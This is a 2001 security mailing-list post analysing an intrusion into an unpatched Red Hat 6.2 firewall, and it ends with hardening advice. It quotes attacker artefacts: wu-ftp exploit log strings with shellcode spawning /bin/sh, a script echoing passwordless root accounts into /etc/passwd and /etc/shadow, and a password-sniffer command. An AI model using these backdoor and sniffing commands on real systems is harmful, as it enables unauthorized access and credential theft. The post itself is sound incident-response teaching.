Security Incidents mailing list archives

RedHat 6.2 box exploited - analysis of attacker activity

From: Curt Wilson <netw3 () NETW3 COM>
Date: Sun, 4 Feb 2001 06:56:45 -0000

Curt Wilson, Netw3 Consulting 02/02/2001

This is my first analysis of a Linux box that has been 
rooted. This is intended to be somewhat of a teaching 
document, and does not assume a large degree of 
technical skill. If anyone sees any errors in here or 
has any comments, I'd be happy to hear from you at 
netw3 () netw3 com

The box in question is an unpatched Red Hat Linux 
6.2 machine running as an ipchains firewall and IP 
masquerade server.

The attacker(s) main goal in system compromise 
seems to be for the purpose of setting up a BNC 
server that will allow connections to IRC networks 
and an IRC bot. Attacker also used the compromised 
linux system to search for other vulnerable systems 
running the Washington University FTP through the 
use of two exploits (wu-scan and muje) as well as 
the attempted or actual exploits of numerous remote 
systems through the statdx exploit. The statd exploit 
attacks the remote procedure call application 
rpc.statd and opens up an interactive root shell on 
TCP port 39168. (For more info on statdx, see paper 
by George Bakos at

Intruder erased log directory /var/log which damaged 
numerous symlinks. A more careful attacker would 
have left this directory intact but edited the specific 
log files to erase their tracks. It is clear from system 
analysis that this person is what’s known as a “script 
kiddie” and does not represent an advanced attacker.

Intruder appears to have penetrated the system using 
an exploit that attacks WU-FTP. The default wu-ftp on 
Red Hat 6.2 (wu-2.6.0(1) in this case) is vulnerable 
and exploit code has been published on the Internet 
and has been in wide use amongst the cracker 
underground. Patches are available on the redhat 

Buffer overflow attacks on wu-ftp take place through 
a specially crafted password sequence that includes 
the spawning of /bin/sh. The IP addresses are most 
likely other compromised systems that the attackers 
are using to break into other sites and could be one of 
the sites that was used to crack this box. Logs of 
attacks in progress: => external_ip_of_linux_system [21]
LeLmNnNnUSER ftp
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 => external_ip_of_linux_system [21]
user ftp]-1pass 111F11CA?
3-a-aSITE EXEC %x %x %x %x +%x |%x => external_ip_of_linux_system [21]
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 => 
external_ip_of_linux_system [21]
q-q-q-q-USER ftp
q-%PASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 => external_ip_of_linux_system [21]
pPASS 111F11CA?
k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 => external_ip_of_linux_system [21]
L'L'0$L)^1L)^1USER ftp
L)k1PASS 111F11CA?

The wu-ftp exploit probably allowed the attacker to 
bind /bin/sh with a TCP port. The attacker then 
telnets to the port and has interactive root access. 
Another method is that the exploit allows the 
execution of arbitrary code such as appending a 
username into the /etc/passwd and /etc/shadow files 
that is then used through the telnet port. Without 
detailed logs, it’s hard to know exactly what the 
attacker did since they cleaned up some other 
commonly exploited services when they first logged 
in to the system. It’s possible that the attacker gained 
some other means of initial access but evidence 
suggests that these FTP exploits were the means. A 
Red Hat announcement about this problem can be 
found at

At some point, this attacker (or other attackers) 
placed a file in /bin/psr which adds a user 
named “rewt” with root level access and a user 
named “mujixi” to the /etc/passwd and /etc/shadow 

echo "rewt:x:0:0:root user,,,:/root:/bin/bash" 
echo "mujixi:x:666:666:ala care da 
muje,,,:/tmp:/bin/bash" >>/etc/passwd
echo "rewt::::::::" >>/etc/shadow
echo "mujixi::::::::" >>/etc/shadow

After obtaining root access, attacker modified multiple 
system files and scripts to cover their tracks:

/etc/rc.d/rc.sysinit has been modified to run the 


/usr/sbin/gpm.root appears to be controlled by a 
config file /etc/gpm-root.conf and contains the 
following commands:

cd /usr/X11R6/include/X11/…    

This directory is invisible to the standard ls 
command,  but will show up with an ls –a to display 
all files. This is a common attacker trick. Most of 
attackers tools were placed in this directory.

./linsniffer > tcp.log &

linsniffer captures login and passwords in an 
Ethernet environment. A switched network makes 
this attack more 

/usr/sbin/sshd2 –p 1983       

Attacker runs an SSH server on port 1983.

After exploiting the system for root access, the 
attacker appeared to add a username “muje1” to 
the /etc/passwd and/or /etc/shadow files with a group 
ID of 501. Attacker also edited the /etc/ftpusers file, 
perhaps allowing more users to login through FTP 
than the original setting. Other suspicious user id’s 
include “muje” and group ID’s include 1018 and 1004.

Next, attacker kills all instances of the lpd process. 
This is probably so others won’t exploit “his” system 
through an lpd buffer overflow (never mind that lpd 
was not an open port from the outside, attacker 
wanted to secure his own access). Attacker also 
removed the portmapper startup file 
in /etc/rc.d/init.d/portmap which stopped the 
portmapper from listening on TCP port 111 (never 
mind that portmapper was not an open port from the 
outside). Attacker then cleans up by 
running “updatedb” and removing a package named 
srk.tar.gz (which might be a rootkit), and removing 
the home directories of users muje and muje1. 

The user appears to have replaced various system 
binaries such as netstat, ps, ifconfig, and top to cover 
their tracks. The replaced version of ps does not 
show activity such as the linsniffer, and the replaced 
version of ifconfig does now show the interface 
running in promiscuous mode. The other replaced 
binaries are most likely tailored to hide the attackers 
activities from administrators eyes. These 
replacements may have been done with srk.tar.gz. I 
was unable to find a published tool named “srk” but 
the “rk” suggests a rootkit. Please see
kits/ for a large selection of rootkits.

The group ID 1018 appears to have ran the rootkit. 
The system binaries that were replaced by this 
activity are as follows:

-rwxr-xr-x    1 1018     users       19840 Nov 25  
1998 /sbin/ifconfig
-rwxr-xr-x    1 1018     users       33280 Dec 27  
1998 /bin/ps
-rwxr-xr-x    1 1018     users       35300 Jan  2  
1999 /bin/netstat
-rwxr-xr-x    1 1018     users       53588 Jan 12  
1999 /usr/bin/top
-rwxr-xr-x    1 1018     users       13621 Dec 19 
10:14 /bin/vobiscu (unfamiliar)

The group ID 1004 created the following files of 

[root@fortran /dev]# ls -al /dev/caca
-rw-rw-r--    1 root     501           117 Jan 13 
21:01 /dev/caca

[root@fortran /dev]# strings /dev/caca
1 193.226.125
1 193.230.192
1 194.102.218
1 193.231.249
3 31221
3 31337
3 89898
3 44113
3 31223
3 22546
3 666
4 6666

31337 is commonly used in the computer 
underground. Many Trojan horse applications listen 
on port 31337. It is a variation of the word “elite”. 666 
is used by attackers, and port 6666 may refer to an 
IRC or BNC server.

-rw-rw-r--    1 root     501            97 Jan 13 
21:01 /dev/dsx

[root@fortran /netw3]# strings /dev/dsx | more
3 psybnc
3 wu-scan
3 muje
3 statdx
3 sl2
3 sshd2
3 linsniffer
3 smurf 
3 slice
3 mech
3 muh
3 bnc

/dev/dsx appears to be a listing of what the attacker 
has installed.

-rw-rw-r--    1 root     501         12288 Jan 13 
21:01 /etc/psdevtab

[root@fortran .ssh]# ls -al /root/.ssh
total 16
drwxr-xr-x    2 root     501          4096 Jan 24 00:17 .
drwxr-x---    8 root     root         4096 Feb  2 18:54 ..
-rw-------    1 root     root          663 Jan 28 20:41 
-rw-------    1 root     501           512 Jan 28 20:41 

-rw-r--r--    1 1004     users         307 Aug 31  
1998 /usr/man/man6/ssh_config
-rw-------    1 root     501           552 Jan 13 
21:01 /usr/man/man6/ssh_host_key
-rw-rw-r--    1 root     501           356 Jan 13 
21:01 /usr/man/man6/
-rw-------    1 root     501           512 Feb  3 
04:55 /usr/man/man6/ssh_random_seed
-rw-r--r--    1 1004     users         697 Dec 27  
1998 /usr/man/man6/sshd_config

/usr/man/man6 is also used by attacker(s) to store 
SSH key and configuration files.

The following ports are open and listening on the local 
(192.168) interface of the system:

21 ftp          # point of entry
22 ssh          # activated by attacker
23 telnet               
25 smtp
79 finger
98 linuxconf    
113 auth
513 rlogin
514 rsh 
515 lp
1983  ssh               # activated by attacker
The primary user that ran the BNC server appears to 
go by the name of “bulangia” or “buLaneL” 
or “bulanel” and a secondary user goes by the name 
of “NINA16”. There is evidence of multiple 
connections to Bulgaria and Italian IRC networks and 
remote systems. Some of the hosts that used the 
BNC server include and Various IRC servers were visited 
by these users, and if further action was warranted, 
investigations could take place by connecting to the 
same IRC networks and attempting to track these 
people down. 

Attacker(s) also installed what appears to be an IRC 
bot going by the name of “eddy” or “eddybot”. The 
software package used to implement this bot was 
called emech-2.8 and the config file for e-mech 
reveals details such as an ircname of  “H-a-c-k T-h-e 
F-u-c-k-i-n-g P-l-a-n-e-t !” and channels such 
as “#Linux_mafia”. The linkpass and entityname are 
present in the config and users file, which could allow 
counterintelligence to be performed if desired. 


Apply patches to Red Hat systems running ipchains 
firewalls. Red Hat 6.2 has nearly 50 security patches. 

Several accounts and passwords were obtained 
through the user of the linsniffer application. A 
switched environment can help reduce the risk of 
sniffing attacks.

Lock down systems to provide “defense in depth”. Do 
not simply rely upon ipchains to block hostile traffic. 
Deny all traffic except  what is specifically allowed. 
Comment out services in /etc/services that do not 
need to be ran (finger, etc) as well as in /etc/rc.d. If 
the FTP service will be used, make sure 
that /etc/ftpusers only allows specific usernames.  If 
attacker pierces firewall mechanism, limit what is 
available by turning off everything that is not needed, 
leaving only those services that are truly necessary. 

Portsentry, which is running on the system, is a nice 
addition, but obviously did not help in this instance. 
Since the wu-ftp vulnerabilities are widely known, 
attacker would only have to find the existence of TCP 
port 21 with a banner that identified itself as a 
vulnerable version of wu-ftp. The use of TCP 
wrappers and ipchains to restrict access to ftpd 
would be helpful. Modify listening services banners to 
reflect false information to confuse attackers and 
automated exploit/scanning applications.

Systems management should never be performed 
over an unencrypted connection such as telnet. 
Install SSH on the server and on your client systems 
and use it. This encrypts connections and makes it 
much harder for an attacker to obtain your login 

An intrusion detection system such as snort 
( is inexpensive, easy to configure, 
and in wide use. Snort can monitor a network and 
alert a network manager (with the proper 
configuration) via pager or email that an attack is 
taking place. Tripwire is a file integrity monitor that 
can be used to take a snapshot of certain key system 
files ( such as ps, netstat, ifconfig, and many more). 
When these key system files are changed, an alert 
can be generated to notify that something suspicious 
is taking place. There are freeware/GPL options for 
SSH (openSSH) and a freeware tripwire clone 
available on the Internet (see for 
a large collection of open source security tools).

Curt Wilson - Netw3 Consulting
netw3 () netw3 com

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